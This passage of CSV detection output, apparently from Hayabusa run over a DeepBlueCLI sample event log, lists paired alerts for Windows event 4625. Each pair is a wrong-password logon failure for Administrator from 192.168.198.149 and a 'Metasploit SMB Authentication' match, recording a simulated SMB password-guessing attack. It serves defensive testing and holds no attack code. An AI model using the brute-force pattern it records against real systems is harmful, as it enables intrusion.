Password,User: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
